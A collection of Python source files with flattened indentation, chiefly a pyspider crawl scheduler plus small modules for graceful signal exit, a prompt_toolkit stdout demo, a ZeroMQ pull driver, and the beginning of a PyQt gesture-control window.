exetime = _schedule.get('exetime', self.default_schedule['exetime'])
task_queue.put(taskid, priority, exetime)
project.task_loaded = True
logger.debug('project: %s loaded %d tasks.', project.name, len(task_queue))
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
self._cnt['all'].value((project.name, 'pending'), len(project.task_queue))
def _update_project_cnt(self, project_name):
status_count = self.taskdb.status_count(project_name)
self._cnt['all'].value(
(project_name, 'success'),
status_count.get(self.taskdb.SUCCESS, 0)
)
self._cnt['all'].value(
(project_name, 'failed'),
status_count.get(self.taskdb.FAILED, 0) + status_count.get(self.taskdb.BAD, 0)
)
self._cnt['all'].value(
(project_name, 'pending'),
status_count.get(self.taskdb.ACTIVE, 0)
)
def task_verify(self, task):
        '''
        return False if any of 'taskid', 'project', 'url' is missing from the task dict,
        or if the project is unknown or inactive
        '''
for each in ('taskid', 'project', 'url', ):
if each not in task or not task[each]:
logger.error('%s not in task: %.200r', each, task)
return False
if task['project'] not in self.projects:
logger.error('unknown project: %s', task['project'])
return False
project = self.projects[task['project']]
if not project.active:
logger.error('project %s not started, please set status to RUNNING or DEBUG',
task['project'])
return False
return True
def insert_task(self, task):
'''insert task into database'''
return self.taskdb.insert(task['project'], task['taskid'], task)
def update_task(self, task):
'''update task in database'''
return self.taskdb.update(task['project'], task['taskid'], task)
def put_task(self, task):
'''put task to task queue'''
_schedule = task.get('schedule', self.default_schedule)
self.projects[task['project']].task_queue.put(
task['taskid'],
priority=_schedule.get('priority', self.default_schedule['priority']),
exetime=_schedule.get('exetime', self.default_schedule['exetime'])
)
def send_task(self, task, force=True):
        '''
        dispatch task to fetcher
        the out queue may have a size limit to prevent blocking; tasks are kept in
        send_buffer when it is full
        '''
try:
self.out_queue.put_nowait(task)
except Queue.Full:
if force:
self._send_buffer.appendleft(task)
else:
raise
def _check_task_done(self):
'''Check status queue'''
cnt = 0
try:
while True:
task = self.status_queue.get_nowait()
# check _on_get_info result here
if task.get('taskid') == '_on_get_info' and 'project' in task and 'track' in task:
if task['project'] not in self.projects:
continue
project = self.projects[task['project']]
project.on_get_info(task['track'].get('save') or {})
logger.info(
'%s on_get_info %r', task['project'], task['track'].get('save', {})
)
continue
elif not self.task_verify(task):
continue
self.on_task_status(task)
cnt += 1
except Queue.Empty:
pass
return cnt
merge_task_fields = ['taskid', 'project', 'url', 'status', 'schedule', 'lastcrawltime']
def _check_request(self):
'''Check new task queue'''
# check _postpone_request first
todo = []
for task in self._postpone_request:
if task['project'] not in self.projects:
continue
if self.projects[task['project']].task_queue.is_processing(task['taskid']):
todo.append(task)
else:
self.on_request(task)
self._postpone_request = todo
tasks = {}
while len(tasks) < self.LOOP_LIMIT:
try:
task = self.newtask_queue.get_nowait()
except Queue.Empty:
break
if isinstance(task, list):
_tasks = task
else:
_tasks = (task, )
for task in _tasks:
if not self.task_verify(task):
continue
if task['taskid'] in self.projects[task['project']].task_queue:
if not task.get('schedule', {}).get('force_update', False):
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
continue
if task['taskid'] in tasks:
if not task.get('schedule', {}).get('force_update', False):
continue
tasks[task['taskid']] = task
for task in itervalues(tasks):
self.on_request(task)
return len(tasks)
def _check_cronjob(self):
"""Check projects cronjob tick, return True when a new tick is sended"""
now = time.time()
self._last_tick = int(self._last_tick)
if now - self._last_tick < 1:
return False
self._last_tick += 1
for project in itervalues(self.projects):
if not project.active:
continue
if project.waiting_get_info:
continue
if int(project.min_tick) == 0:
continue
if self._last_tick % int(project.min_tick) != 0:
continue
self.on_select_task({
'taskid': '_on_cronjob',
'project': project.name,
'url': 'data:,_on_cronjob',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': {
'tick': self._last_tick,
},
},
'process': {
'callback': '_on_cronjob',
},
})
return True
request_task_fields = [
'taskid',
'project',
'url',
'status',
'schedule',
'fetch',
'process',
'track',
'lastcrawltime'
]
def _check_select(self):
'''Select task to fetch & process'''
while self._send_buffer:
_task = self._send_buffer.pop()
try:
                # use force=False here so a full out_queue raises instead of silently
                # re-appending to send_buffer
self.send_task(_task, False)
except Queue.Full:
self._send_buffer.append(_task)
break
if self.out_queue.full():
return {}
taskids = []
cnt = 0
cnt_dict = dict()
limit = self.LOOP_LIMIT
for project in itervalues(self.projects):
if not project.active:
continue
            # only check the project pause state when selecting new tasks; cronjobs and new requests keep working
if project.paused:
continue
if project.waiting_get_info:
continue
if cnt >= limit:
break
# task queue
task_queue = project.task_queue
task_queue.check_update()
project_cnt = 0
            # check send_buffer here; when it's not empty, out_queue may be blocked, so don't send more tasks
while cnt < limit and project_cnt < limit / 10:
taskid = task_queue.get()
if not taskid:
break
taskids.append((project.name, taskid))
if taskid != 'on_finished':
project_cnt += 1
cnt += 1
cnt_dict[project.name] = project_cnt
if project_cnt:
project._selected_tasks = True
project._send_finished_event_wait = 0
# check and send finished event to project
if not project_cnt and len(task_queue) == 0 and project._selected_tasks:
# wait for self.FAIL_PAUSE_NUM steps to make sure all tasks in queue have been processed
if project._send_finished_event_wait < self.FAIL_PAUSE_NUM:
project._send_finished_event_wait += 1
else:
project._selected_tasks = False
project._send_finished_event_wait = 0
self._postpone_request.append({
'project': project.name,
'taskid': 'on_finished',
'url': 'data:,on_finished',
'process': {
'callback': 'on_finished',
},
"schedule": {
"age": 0,
"priority": 9,
"force_update": True,
},
})
for project, taskid in taskids:
self._load_put_task(project, taskid)
return cnt_dict
def _load_put_task(self, project, taskid):
try:
task = self.taskdb.get_task(project, taskid, fields=self.request_task_fields)
except ValueError:
logger.error('bad task pack %s:%s', project, taskid)
return
if not task:
return
task = self.on_select_task(task)
def _print_counter_log(self):
# print top 5 active counters
keywords = ('pending', 'success', 'retry', 'failed')
total_cnt = {}
project_actives = []
project_fails = []
for key in keywords:
total_cnt[key] = 0
for project, subcounter in iteritems(self._cnt['5m']):
actives = 0
for key in keywords:
cnt = subcounter.get(key, None)
if cnt:
cnt = cnt.sum
total_cnt[key] += cnt
actives += cnt
project_actives.append((actives, project))
fails = subcounter.get('failed', None)
if fails:
project_fails.append((fails.sum, project))
top_2_fails = sorted(project_fails, reverse=True)[:2]
top_3_actives = sorted([x for x in project_actives if x[1] not in top_2_fails],
reverse=True)[:5 - len(top_2_fails)]
log_str = ("in 5m: new:%(pending)d,success:%(success)d,"
"retry:%(retry)d,failed:%(failed)d" % total_cnt)
for _, project in itertools.chain(top_3_actives, top_2_fails):
subcounter = self._cnt['5m'][project].to_dict(get_value='sum')
log_str += " %s:%d,%d,%d,%d" % (project,
subcounter.get('pending', 0),
subcounter.get('success', 0),
subcounter.get('retry', 0),
subcounter.get('failed', 0))
logger.info(log_str)
def _dump_cnt(self):
'''Dump counters to file'''
self._cnt['1h'].dump(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].dump(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].dump(os.path.join(self.data_path, 'scheduler.all'))
def _try_dump_cnt(self):
'''Dump counters every 60 seconds'''
now = time.time()
if now - self._last_dump_cnt > 60:
self._last_dump_cnt = now
self._dump_cnt()
self._print_counter_log()
def _check_delete(self):
'''Check project delete'''
now = time.time()
for project in list(itervalues(self.projects)):
if project.db_status != 'STOP':
continue
if now - project.updatetime < self.DELETE_TIME:
continue
if 'delete' not in self.projectdb.split_group(project.group):
continue
logger.warning("deleting project: %s!", project.name)
del self.projects[project.name]
self.taskdb.drop(project.name)
self.projectdb.drop(project.name)
if self.resultdb:
self.resultdb.drop(project.name)
for each in self._cnt.values():
del each[project.name]
def __len__(self):
return sum(len(x.task_queue) for x in itervalues(self.projects))
def quit(self):
'''Set quit signal'''
self._quit = True
# stop xmlrpc server
if hasattr(self, 'xmlrpc_server'):
self.xmlrpc_ioloop.add_callback(self.xmlrpc_server.stop)
self.xmlrpc_ioloop.add_callback(self.xmlrpc_ioloop.stop)
def run_once(self):
        '''consume queues and feed tasks to fetcher, once'''
self._update_projects()
self._check_task_done()
self._check_request()
while self._check_cronjob():
pass
self._check_select()
self._check_delete()
self._try_dump_cnt()
def run(self):
'''Start scheduler loop'''
logger.info("scheduler starting...")
while not self._quit:
try:
time.sleep(self.LOOP_INTERVAL)
self.run_once()
self._exceptions = 0
except KeyboardInterrupt:
break
except Exception as e:
logger.exception(e)
self._exceptions += 1
if self._exceptions > self.EXCEPTION_LIMIT:
break
continue
logger.info("scheduler exiting...")
self._dump_cnt()
def trigger_on_start(self, project):
'''trigger an on_start callback of project'''
self.newtask_queue.put({
"project": project,
"taskid": "on_start",
"url": "data:,on_start",
"process": {
"callback": "on_start",
},
})
def xmlrpc_run(self, port=23333, bind='127.0.0.1', logRequests=False):
'''Start xmlrpc interface'''
from pyspider.libs.wsgi_xmlrpc import WSGIXMLRPCApplication
application = WSGIXMLRPCApplication()
application.register_function(self.quit, '_quit')
application.register_function(self.__len__, 'size')
def dump_counter(_time, _type):
try:
return self._cnt[_time].to_dict(_type)
except:
logger.exception('')
application.register_function(dump_counter, 'counter')
def new_task(task):
if self.task_verify(task):
self.newtask_queue.put(task)
return True
return False
application.register_function(new_task, 'newtask')
def send_task(task):
'''dispatch task to fetcher'''
self.send_task(task)
return True
application.register_function(send_task, 'send_task')
def update_project():
self._force_update_project = True
application.register_function(update_project, 'update_project')
def get_active_tasks(project=None, limit=100):
allowed_keys = set((
'type',
'taskid',
'project',
'status',
'url',
'lastcrawltime',
'updatetime',
'track',
))
track_allowed_keys = set((
'ok',
'time',
'follows',
'status_code',
))
iters = [iter(x.active_tasks) for k, x in iteritems(self.projects)
if x and (k == project if project else True)]
tasks = [next(x, None) for x in iters]
result = []
while len(result) < limit and tasks and not all(x is None for x in tasks):
updatetime, task = t = max(t for t in tasks if t)
i = tasks.index(t)
tasks[i] = next(iters[i], None)
for key in list(task):
if key == 'track':
for k in list(task[key].get('fetch', [])):
if k not in track_allowed_keys:
del task[key]['fetch'][k]
for k in list(task[key].get('process', [])):
if k not in track_allowed_keys:
del task[key]['process'][k]
if key in allowed_keys:
continue
del task[key]
result.append(t)
# fix for "<type 'exceptions.TypeError'>:dictionary key must be string"
# have no idea why
return json.loads(json.dumps(result))
application.register_function(get_active_tasks, 'get_active_tasks')
def get_projects_pause_status():
result = {}
for project_name, project in iteritems(self.projects):
result[project_name] = project.paused
return result
application.register_function(get_projects_pause_status, 'get_projects_pause_status')
def webui_update():
return {
'pause_status': get_projects_pause_status(),
'counter': {
'5m_time': dump_counter('5m_time', 'avg'),
'5m': dump_counter('5m', 'sum'),
'1h': dump_counter('1h', 'sum'),
'1d': dump_counter('1d', 'sum'),
'all': dump_counter('all', 'sum'),
},
}
application.register_function(webui_update, 'webui_update')
import tornado.wsgi
import tornado.ioloop
import tornado.httpserver
container = tornado.wsgi.WSGIContainer(application)
self.xmlrpc_ioloop = tornado.ioloop.IOLoop()
self.xmlrpc_server = tornado.httpserver.HTTPServer(container, io_loop=self.xmlrpc_ioloop)
self.xmlrpc_server.listen(port=port, address=bind)
logger.info('scheduler.xmlrpc listening on %s:%s', bind, port)
self.xmlrpc_ioloop.start()
def on_request(self, task):
if self.INQUEUE_LIMIT and len(self.projects[task['project']].task_queue) >= self.INQUEUE_LIMIT:
logger.debug('overflow task %(project)s:%(taskid)s %(url)s', task)
return
oldtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.merge_task_fields)
if oldtask:
return self.on_old_request(task, oldtask)
else:
return self.on_new_request(task)
def on_new_request(self, task):
'''Called when a new request is arrived'''
task['status'] = self.taskdb.ACTIVE
self.insert_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
self._cnt['all'].event((project, 'pending'), +1)
logger.info('new task %(project)s:%(taskid)s %(url)s', task)
return task
def on_old_request(self, task, old_task):
'''Called when a crawled task is arrived'''
now = time.time()
_schedule = task.get('schedule', self.default_schedule)
old_schedule = old_task.get('schedule', {})
if _schedule.get('force_update') and self.projects[task['project']].task_queue.is_processing(task['taskid']):
            # when a task is being processed, a modification may conflict with the running task;
            # postpone the modification until the task has finished.
logger.info('postpone modify task %(project)s:%(taskid)s %(url)s', task)
self._postpone_request.append(task)
return
restart = False
schedule_age = _schedule.get('age', self.default_schedule['age'])
if _schedule.get('itag') and _schedule['itag'] != old_schedule.get('itag'):
restart = True
elif schedule_age >= 0 and schedule_age + (old_task.get('lastcrawltime', 0) or 0) < now:
restart = True
elif _schedule.get('force_update'):
restart = True
if not restart:
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
return
if _schedule.get('cancel'):
logger.info('cancel task %(project)s:%(taskid)s %(url)s', task)
task['status'] = self.taskdb.BAD
self.update_task(task)
self.projects[task['project']].task_queue.delete(task['taskid'])
return task
task['status'] = self.taskdb.ACTIVE
self.update_task(task)
self.put_task(task)
project = task['project']
if old_task['status'] != self.taskdb.ACTIVE:
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
if old_task['status'] == self.taskdb.SUCCESS:
self._cnt['all'].event((project, 'success'), -1).event((project, 'pending'), +1)
elif old_task['status'] == self.taskdb.FAILED:
self._cnt['all'].event((project, 'failed'), -1).event((project, 'pending'), +1)
logger.info('restart task %(project)s:%(taskid)s %(url)s', task)
return task
def on_task_status(self, task):
'''Called when a status pack is arrived'''
try:
procesok = task['track']['process']['ok']
if not self.projects[task['project']].task_queue.done(task['taskid']):
logging.error('not processing pack: %(project)s:%(taskid)s %(url)s', task)
return None
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def on_task_done(self, task):
'''Called when a task is done and success, called by `on_task_status`'''
task['status'] = self.taskdb.SUCCESS
task['lastcrawltime'] = time.time()
if 'schedule' in task:
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
task['status'] = self.taskdb.ACTIVE
next_exetime = task['schedule'].get('age')
task['schedule']['exetime'] = time.time() + next_exetime
self.put_task(task)
else:
del task['schedule']
update_start = time.time()
self.update_task(task)
        update_end = time.time()
project = task['project']
self._cnt['5m'].event((project, 'success'), +1)
self._cnt['1h'].event((project, 'success'), +1)
self._cnt['1d'].event((project, 'success'), +1)
self._cnt['all'].event((project, 'success'), +1).event((project, 'pending'), -1)
        logger.info('task done %(project)s:%(taskid)s %(url)s update task cost: ' + str(update_end - update_start) + 's', task)
return task
def on_task_failed(self, task):
'''Called when a task is failed, called by `on_task_status`'''
if 'schedule' not in task:
old_task = self.taskdb.get_task(task['project'], task['taskid'], fields=['schedule'])
if old_task is None:
logging.error('unknown status pack: %s' % task)
return
task['schedule'] = old_task.get('schedule', {})
retries = task['schedule'].get('retries', self.default_schedule['retries'])
retried = task['schedule'].get('retried', 0)
project_info = self.projects[task['project']]
retry_delay = project_info.retry_delay or self.DEFAULT_RETRY_DELAY
next_exetime = retry_delay.get(retried, retry_delay.get('', self.DEFAULT_RETRY_DELAY['']))
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
next_exetime = min(next_exetime, task['schedule'].get('age'))
else:
if retried >= retries:
next_exetime = -1
elif 'age' in task['schedule'] and next_exetime > task['schedule'].get('age'):
next_exetime = task['schedule'].get('age')
if next_exetime < 0:
task['status'] = self.taskdb.FAILED
task['lastcrawltime'] = time.time()
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'failed'), +1)
self._cnt['1h'].event((project, 'failed'), +1)
self._cnt['1d'].event((project, 'failed'), +1)
self._cnt['all'].event((project, 'failed'), +1).event((project, 'pending'), -1)
logger.info('task failed %(project)s:%(taskid)s %(url)s' % task)
return task
else:
task['schedule']['retried'] = retried + 1
task['schedule']['exetime'] = time.time() + next_exetime
task['lastcrawltime'] = time.time()
self.update_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'retry'), +1)
self._cnt['1h'].event((project, 'retry'), +1)
self._cnt['1d'].event((project, 'retry'), +1)
# self._cnt['all'].event((project, 'retry'), +1)
logger.info('task retry %d/%d %%(project)s:%%(taskid)s %%(url)s' % (
retried, retries), task)
return task
def on_select_task(self, task):
'''Called when a task is selected to fetch & process'''
        # inject information about the project
logger.info('select %(project)s:%(taskid)s %(url)s', task)
project_info = self.projects.get(task['project'])
assert project_info, 'no such project'
task['type'] = self.TASK_PACK
task['group'] = project_info.group
task['project_md5sum'] = project_info.md5sum
task['project_updatetime'] = project_info.updatetime
# lazy join project.crawl_config
if getattr(project_info, 'crawl_config', None):
task = BaseHandler.task_join_crawl_config(task, project_info.crawl_config)
project_info.active_tasks.appendleft((time.time(), task))
self.send_task(task)
return task
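# Editor's illustration (not part of pyspider): how on_task_failed above consults the
# retry delay mapping -- the integer retry count indexes the dict and the '' entry is
# the catch-all once the count runs past the listed values.
def _sketch_retry_delay(retried, retry_delay=Scheduler.DEFAULT_RETRY_DELAY):
    return retry_delay.get(retried, retry_delay.get('', 24 * 60 * 60))
# e.g. _sketch_retry_delay(0) -> 30 seconds, _sketch_retry_delay(7) -> 86400 seconds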
from tornado import gen
class OneScheduler(Scheduler):
"""
Scheduler Mixin class for one mode
    overwrites the send_task method
call processor.on_task(fetcher.fetch(task)) instead of consuming queue
"""
def _check_select(self):
"""
interactive mode of select tasks
"""
if not self.interactive:
return super(OneScheduler, self)._check_select()
# waiting for running tasks
if self.running_task > 0:
return
is_crawled = []
def run(project=None):
return crawl('on_start', project=project)
def crawl(url, project=None, **kwargs):
"""
Crawl given url, same parameters as BaseHandler.crawl
url - url or taskid, parameters will be used if in taskdb
project - can be ignored if only one project exists.
"""
# looking up the project instance
if project is None:
if len(self.projects) == 1:
project = list(self.projects.keys())[0]
else:
                    raise LookupError('You need to specify the project: %r'
                                      % list(self.projects.keys()))
project_data = self.processor.project_manager.get(project)
if not project_data:
raise LookupError('no such project: %s' % project)
# get task package
instance = project_data['instance']
instance._reset()
task = instance.crawl(url, **kwargs)
if isinstance(task, list):
raise Exception('url list is not allowed in interactive mode')
# check task in taskdb
if not kwargs:
dbtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.request_task_fields)
if not dbtask:
dbtask = self.taskdb.get_task(task['project'], task['url'],
fields=self.request_task_fields)
if dbtask:
task = dbtask
# select the task
self.on_select_task(task)
is_crawled.append(True)
shell.ask_exit()
def quit_interactive():
'''Quit interactive mode'''
is_crawled.append(True)
self.interactive = False
shell.ask_exit()
def quit_pyspider():
'''Close pyspider'''
is_crawled[:] = []
shell.ask_exit()
shell = utils.get_python_console()
banner = (
'pyspider shell - Select task\n'
'crawl(url, project=None, **kwargs) - same parameters as BaseHandler.crawl\n'
'quit_interactive() - Quit interactive mode\n'
'quit_pyspider() - Close pyspider'
)
if hasattr(shell, 'show_banner'):
shell.show_banner(banner)
shell.interact()
else:
shell.interact(banner)
if not is_crawled:
self.ioloop.add_callback(self.ioloop.stop)
def __getattr__(self, name):
"""patch for crawl(url, callback=self.index_page) API"""
if self.interactive:
return name
raise AttributeError(name)
def on_task_status(self, task):
"""Ignore not processing error in interactive mode"""
if not self.interactive:
super(OneScheduler, self).on_task_status(task)
try:
procesok = task['track']['process']['ok']
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def init_one(self, ioloop, fetcher, processor,
result_worker=None, interactive=False):
self.ioloop = ioloop
self.fetcher = fetcher
self.processor = processor
self.result_worker = result_worker
self.interactive = interactive
self.running_task = 0
@gen.coroutine
def do_task(self, task):
self.running_task += 1
result = yield gen.Task(self.fetcher.fetch, task)
type, task, response = result.args
self.processor.on_task(task, response)
# do with message
while not self.processor.inqueue.empty():
_task, _response = self.processor.inqueue.get()
self.processor.on_task(_task, _response)
# do with results
while not self.processor.result_queue.empty():
_task, _result = self.processor.result_queue.get()
if self.result_worker:
self.result_worker.on_result(_task, _result)
self.running_task -= 1
def send_task(self, task, force=True):
if self.fetcher.http_client.free_size() <= 0:
if force:
self._send_buffer.appendleft(task)
else:
                raise Queue.Full
self.ioloop.add_future(self.do_task(task), lambda x: x.result())
def run(self):
import tornado.ioloop
tornado.ioloop.PeriodicCallback(self.run_once, 100,
io_loop=self.ioloop).start()
self.ioloop.start()
def quit(self):
self.ioloop.stop()
logger.info("scheduler exiting...")
import random
import threading
from pyspider.database.sqlite.sqlitebase import SQLiteMixin
class ThreadBaseScheduler(Scheduler):
def __init__(self, threads=4, *args, **kwargs):
self.local = threading.local()
super(ThreadBaseScheduler, self).__init__(*args, **kwargs)
if isinstance(self.taskdb, SQLiteMixin):
self.threads = 1
else:
self.threads = threads
self._taskdb = self.taskdb
self._projectdb = self.projectdb
self._resultdb = self.resultdb
self.thread_objs = []
self.thread_queues = []
self._start_threads()
assert len(self.thread_queues) > 0
@property
def taskdb(self):
if not hasattr(self.local, 'taskdb'):
self.taskdb = self._taskdb.copy()
return self.local.taskdb
@taskdb.setter
def taskdb(self, taskdb):
self.local.taskdb = taskdb
@property
def projectdb(self):
if not hasattr(self.local, 'projectdb'):
self.projectdb = self._projectdb.copy()
return self.local.projectdb
@projectdb.setter
def projectdb(self, projectdb):
self.local.projectdb = projectdb
@property
def resultdb(self):
if not hasattr(self.local, 'resultdb'):
self.resultdb = self._resultdb.copy()
return self.local.resultdb
@resultdb.setter
def resultdb(self, resultdb):
self.local.resultdb = resultdb
def _start_threads(self):
for i in range(self.threads):
queue = Queue.Queue()
thread = threading.Thread(target=self._thread_worker, args=(queue, ))
thread.daemon = True
thread.start()
self.thread_objs.append(thread)
self.thread_queues.append(queue)
def _thread_worker(self, queue):
while True:
method, args, kwargs = queue.get()
try:
method(*args, **kwargs)
except Exception as e:
logger.exception(e)
def _run_in_thread(self, method, *args, **kwargs):
i = kwargs.pop('_i', None)
block = kwargs.pop('_block', False)
if i is None:
while True:
for queue in self.thread_queues:
if queue.empty():
break
else:
if block:
time.sleep(0.1)
continue
else:
queue = self.thread_queues[random.randint(0, len(self.thread_queues)-1)]
break
else:
queue = self.thread_queues[i % len(self.thread_queues)]
queue.put((method, args, kwargs))
if block:
self._wait_thread()
def _wait_thread(self):
while True:
if all(queue.empty() for queue in self.thread_queues):
break
time.sleep(0.1)
def _update_project(self, project):
self._run_in_thread(Scheduler._update_project, self, project)
def on_task_status(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_task_status, self, task, _i=i)
def on_request(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_request, self, task, _i=i)
def _load_put_task(self, project, taskid):
i = hash(taskid)
self._run_in_thread(Scheduler._load_put_task, self, project, taskid, _i=i)
def run_once(self):
super(ThreadBaseScheduler, self).run_once()
self._wait_thread()
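# Editor's illustration (not part of pyspider): the per-thread database handle pattern
# used by the taskdb/projectdb/resultdb properties above, reduced to a standalone
# sketch. `shared` is assumed to expose a copy() method, as the pyspider database
# wrappers do.
class _LocalCopySketch(object):
    def __init__(self, shared):
        self._shared = shared
        self._local = threading.local()
    @property
    def handle(self):
        if not hasattr(self._local, 'handle'):
            self._local.handle = self._shared.copy()  # one connection per thread
        return self._local.handle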
|
exit.py
|
"""
Exit the program gracefully when certain signals arrive.
"""
import threading
import signal
import sys
from threading import Thread,Semaphore
import collections
this = sys.modules[__name__]
this.lock = threading.Lock()
this.exit_worker = None
this.exit_barrier = None
this.exit_list = []
this.finish_barrier = None
def __graceful_exit_worker():
"""
Wait for the exit lock to become available, then call all of the
exit calls.
"""
#print "GEW START"
assert this.exit_barrier is not None
    # Wait for the handler to tell us we're exiting
this.exit_barrier.wait()
#print "GEW PAST BARRIER"
with this.lock:
#print "GEW DOING EXIT WORK"
for call in this.exit_list:
#print "GEW calling", call
call()
# Let on_graceful_exit know it can exit
this.finish_barrier.wait()
#print "GEW DONE"
def on_graceful_exit(call):
"""
Add an item to the list of calls to be made during a graceful
exit. If the exit worker isn't running, start it.
"""
#print "OGE", call
    if not callable(call):
        raise ValueError("%s is not callable" % call)
with this.lock:
if this.exit_worker is None and this.exit_barrier is None:
#print "OGE INITIALIZING"
this.finish_barrier = threading.Barrier(2)
this.exit_barrier = threading.Barrier(2)
this.exit_worker = threading.Thread(
target=lambda: __graceful_exit_worker())
            this.exit_worker.daemon = True
this.exit_worker.start()
#print "OGE APPENDING", call
this.exit_list.append(call)
#print "OGE DONE"
def __exit_handler(signum, frame):
"""
Let the worker go. This doesn't do much of anything because it's
called from inside a signal handler.
"""
#print "EH START"
with this.lock:
exit_barrier = this.exit_barrier
if exit_barrier is not None:
# Meet up with the worker
this.exit_barrier.wait()
#print "EH FIRST BARRIER"
# Wait for the worker to be done
this.finish_barrier.wait()
#print "EH HANDLER FINISHED"
#print "EH DONE"
sys.exit(0)
def set_graceful_exit():
"""
Set up a graceful exit when certain signals arrive.
"""
for sig in [signal.SIGHUP,
signal.SIGINT,
signal.SIGQUIT,
signal.SIGTERM]:
signal.signal(sig, __exit_handler)
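# Editor's usage sketch (not part of the original module): register cleanup callbacks
# first, then install the signal handlers. The callback below is illustrative only.
def _example_setup():
    on_graceful_exit(lambda: print("closing connections"))
    set_graceful_exit()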
|
patch-stdout.py
|
#!/usr/bin/env python
"""
An example that demonstrates how `patch_stdout` works.
This makes sure that output from other threads doesn't disturb the rendering of
the prompt, but instead is printed nicely above the prompt.
"""
from __future__ import unicode_literals
import threading
import time
from prompt_toolkit2 import prompt
from prompt_toolkit2.patch_stdout import patch_stdout
def main():
# Print a counter every second in another thread.
running = True
def thread():
i = 0
while running:
i += 1
print('i=%i' % i)
time.sleep(1)
t = threading.Thread(target=thread)
t.daemon = True
t.start()
# Now read the input. The print statements of the other thread
# should not disturb anything.
with patch_stdout():
result = prompt('Say something: ')
print('You said: %s' % result)
# Stop thread.
running = False
if __name__ == '__main__':
main()
|
pull.py
|
import contextlib
from threading import Thread
import zmq
from osgar.bus import BusShutdownException
import osgar.lib.serialize
class Pull:
def __init__(self, config, bus):
bus.register(*config['outputs'])
self.is_bind_set = config.get("bind", False)
self.endpoint = config.get('endpoint', 'tcp://127.0.0.1:5565')
self.timeout = config.get('timeout', 1) # default recv timeout 1s
self.thread = Thread(target=self.run)
self.thread.name = bus.name
self.bus = bus
def start(self):
self.thread.start()
def join(self, timeout=None):
self.thread.join(timeout=timeout)
def run(self):
context = zmq.Context.instance()
socket = context.socket(zmq.PULL)
# https://stackoverflow.com/questions/7538988/zeromq-how-to-prevent-infinite-wait
socket.RCVTIMEO = int(self.timeout * 1000) # convert to milliseconds
if self.is_bind_set:
socket.LINGER = 100
socket.bind(self.endpoint)
else:
socket.connect(self.endpoint)
with contextlib.closing(socket):
while self.bus.is_alive():
try:
channel, raw = socket.recv_multipart()
message = osgar.lib.serialize.deserialize(raw)
self.bus.publish(channel.decode('ascii'), message)
except zmq.error.Again:
pass
def request_stop(self):
self.bus.shutdown()
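# Editor's illustration (not part of osgar): a minimal PUSH-side counterpart to the
# Pull driver above, assuming the default config (Pull connects, so the sender binds)
# and that osgar.lib.serialize.serialize() is the inverse of the deserialize() call
# used in run(). The channel name b'example' and payload are illustrative only.
def _example_push_sender(endpoint='tcp://127.0.0.1:5565'):
    socket = zmq.Context.instance().socket(zmq.PUSH)
    socket.bind(endpoint)
    raw = osgar.lib.serialize.serialize({'value': 42})
    socket.send_multipart([b'example', raw])
    socket.close()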
|
mock.py
|
import functools
from PyQt5 import QtCore
from PyQt5.QtWidgets import QMainWindow, QApplication, QAction, qApp
from PyQt5.QtCore import pyqtSlot
import global_style
from frames.frame1.frame1 import Frame1
from frames.frame2.frame2 import Frame2
from frames.frame3.frame3 import Frame3
from frames.frame4.frame4 import Frame4
from frames.main_view.main_view import MainView
from kinect import kinect
import threading
from queue import Queue, Empty
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.setWindowTitle("IAT control by gesture")
self.volumes = [125, 125, 125]
self.directions = [0, 0, 0]
exitAction = QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Anwendung schließen')
exitAction.triggered.connect(qApp.quit)
uebersichtView = QAction('&Übersicht', self)
uebersichtView.setShortcut('Ctrl+A')
uebersichtView.setStatusTip('Übersicht')
uebersichtView.triggered.connect(functools.partial(self.change_frame, 0))
umpumpenView = QAction('&Umpumpen', self)
umpumpenView.setShortcut('Ctrl+S')
umpumpenView.setStatusTip('Umpumpen')
umpumpenView.triggered.connect(functools.partial(self.change_frame, 1))
menubar = self.menuBar()
menu = menubar.addMenu('&Menu')
menu.addAction(exitAction)
menu.addAction(uebersichtView)
menu.addAction(umpumpenView)
self.widget = MainView(self)
self.widgets = [MainView, Frame1, Frame2, Frame3, Frame4]
self.setCentralWidget(self.widget)
self.hand_data = None
self.current_widget_number = 0
self.statusBar().showMessage(u"Übersicht", 10000)
def update(self):
try:
self.update_values()
        except Exception:
            print("Couldn't get new values")
        self.widget.set_slider_position(0, self.volumes[0])
        self.widget.set_slider_position(1, self.volumes[1])
        self.widget.set_slider_position(2, self.volumes[2])
def change_frame(self, widget_index, props=None):
self.widget = self.widgets[widget_index](self)
if props:
self.widget.props = props
print(props)
self.widget.propify()
if len(props) > 3:
self.directions[props[0]] = -1
